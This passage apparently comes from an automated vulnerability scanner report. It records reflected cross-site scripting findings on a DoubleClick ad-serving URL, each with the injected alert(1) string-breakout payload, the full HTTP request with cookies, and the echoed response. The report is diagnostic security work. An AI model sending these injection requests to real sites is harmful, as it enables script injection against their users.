GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight7bbcd'-alert(1)-'4023a71aeed&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
3B4307-300/250%3B41996799/42014586/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265018%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight7bbcd'-alert(1)-'4023a71aeed&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/inte
...[SNIP]...

4.44. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sn1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c9dc"-alert(1)-"de026531d4a was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda6c9dc"-alert(1)-"de026531d4a&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda6c9dc"-alert(1)-"de026531d4a&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799;");
var fscUrl = url;
var fscUrlClickTagFound = fals
...[SNIP]...

4.45. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sn1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1620'-alert(1)-'bf7a9f817b6 was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cdaa1620'-alert(1)-'bf7a9f817b6&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cdaa1620'-alert(1)-'bf7a9f817b6&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799;\">
...[SNIP]...

4.46. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sn2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21b3d"-alert(1)-"15aabbab5ea was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb21b3d"-alert(1)-"15aabbab5ea&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
ww.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb21b3d"-alert(1)-"15aabbab5ea&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799
...[SNIP]...

4.47. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sn2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4f2f'-alert(1)-'b6fb9d14bcc was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bba4f2f'-alert(1)-'b6fb9d14bcc&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
ww.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bba4f2f'-alert(1)-'b6fb9d14bcc&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799
...[SNIP]...

4.48. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [snr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4247"-alert(1)-"8bdcaae1fe2 was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclickf4247"-alert(1)-"8bdcaae1fe2&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
dx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclickf4247"-alert(1)-"8bdcaae1fe2&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799;");
var fscUrl
...[SNIP]...

4.49. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [snr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3263d'-alert(1)-'2764c1dfd7f was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick3263d'-alert(1)-'2764c1dfd7f&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
dx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick3263d'-alert(1)-'2764c1dfd7f&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799;\">
...[SNIP]...

4.50. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [snx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 90a97'-alert(1)-'a16d04ed375 was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=130519866790a97'-alert(1)-'a16d04ed375&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
k.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=130519866790a97'-alert(1)-'a16d04ed375&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799;\">
...[SNIP]...

4.51. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [snx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82a6c"-alert(1)-"89c361df78a was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=130519866782a6c"-alert(1)-"89c361df78a&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
k.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=130519866782a6c"-alert(1)-"89c361df78a&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799;");
var fscUrl = url;
var fscU
...[SNIP]...

4.52. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9ad8'-alert(1)-'abd4b72ba03 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=gotoa9ad8'-alert(1)-'abd4b72ba03&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
8/3b05/7/128/%2a/d%3B240674684%3B0-0%3B0%3B63131103%3B4307-300/250%3B41996799/42014586/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265018%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=gotoa9ad8'-alert(1)-'abd4b72ba03&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be
...[SNIP]...

4.53. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c8cb"-alert(1)-"c06727afda5 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

